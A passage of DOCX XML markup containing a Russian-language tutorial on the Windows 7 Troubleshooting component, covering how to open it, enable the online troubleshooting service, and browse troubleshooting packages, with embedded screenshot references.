      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Щелкните Пуск - </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления - Крупные значки - Устранение неполадок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откроется окно компонента </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение неполадок, рисунок 1. Е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">сли пользователь открыл это окно впервые, то будет предложено получить доступ к Windows Online Troubleshooting Service (WOTS) - это бесплатный онлайн сервис, позволяющий Windows 7 загружать новые или обновленные пакеты поиска неисправностей. Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Да</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, если хотите связаться с WOTS или</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, если хотите пользоваться только встроенными средствами поиска неисправностей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2265032" cy="1814400"/>
            <wp:effectExtent l="19050" t="0" r="1918" b="0"/>
            <wp:docPr id="34" name="Рисунок 26211" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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1" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image200.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2265057" cy="1814420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 1 - Окно компонента </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для того, чтобы получать из интернета сведения или новые средства устранения неполадок внизу окна должен быть установлен флажок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Получить самые последние средства устранения неполадок через интернет-службу устранения неполадок Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кроме того проверьте параметры настройки компонента</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранения неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Для этого нажмите ссылку в левой части окна</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка, рисунок 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="993775" cy="1274445"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Рисунок 26212" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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2" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image201.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="993775" cy="1274445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 2 - Окно </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Убедитесь в том, что флажок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разрешить пользователям просматривать средства устранения неполадок, доступные через интернет - службы устранения неполадок Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> поставлен, рисунок 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3340735" cy="1612900"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="Рисунок 26213" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image202.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3340735" cy="1612900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 3 – Установка флажка</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пакеты поиска неисправностей разбиты по категориям:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1) Программы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2) Оборудование и звук;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3) Сеть и интернет;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4) Оформление и персонализация;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5) </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Просмотр всех категорий</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, рисунок 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="943143" cy="1267200"/>
            <wp:effectExtent l="19050" t="0" r="9357" b="0"/>
            <wp:docPr id="27253" name="Рисунок 26214" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/imag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4" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image203.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="943029" cy="1267047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 4 - Окно </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Просмотр всех категорий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откроется окно, содержащее полный список пакетов устранения неполадок. При этом Windows подключается к сети и проверяет наличие новых пакетов устранения неполадок. Подведите указатель мыши к интересующему пакету и увидите параметры пакета, включающие и его описание, рисунок 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2342550" cy="604795"/>
            <wp:effectExtent l="19050" t="0" r="600" b="0"/>
            <wp:docPr id="27252" name="Рисунок 26215" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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5" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image204.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2342092" cy="604677"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2356950" cy="1427303"/>
            <wp:effectExtent l="19050" t="0" r="5250" b="0"/>
            <wp:docPr id="27251" name="Рисунок 26216" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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6" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image205.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2356674" cy="1427136"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 5 – Параметры пакета</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>При запуске какого-либо пакета устранения неполадок запустится мастер, который может задать несколько вопросов, например, предложит выбрать один из вариантов описания проблемы или выполнить проверку с правами администратора, рисунок 6, 7.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4361"/>
        <w:gridCol w:w="4927"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidTr="003C7D91">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4361" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="004653C4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2032950" cy="1540807"/>
                  <wp:effectExtent l="19050" t="0" r="5400" b="0"/>
                  <wp:docPr id="27233" name="Рисунок 26217" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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7" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image206.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId29" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2032638" cy="1540570"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="004653C4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1860150" cy="1471258"/>
                  <wp:effectExtent l="19050" t="0" r="6750" b="0"/>
                  <wp:docPr id="27234" name="Рисунок 26218" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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8" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image207.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
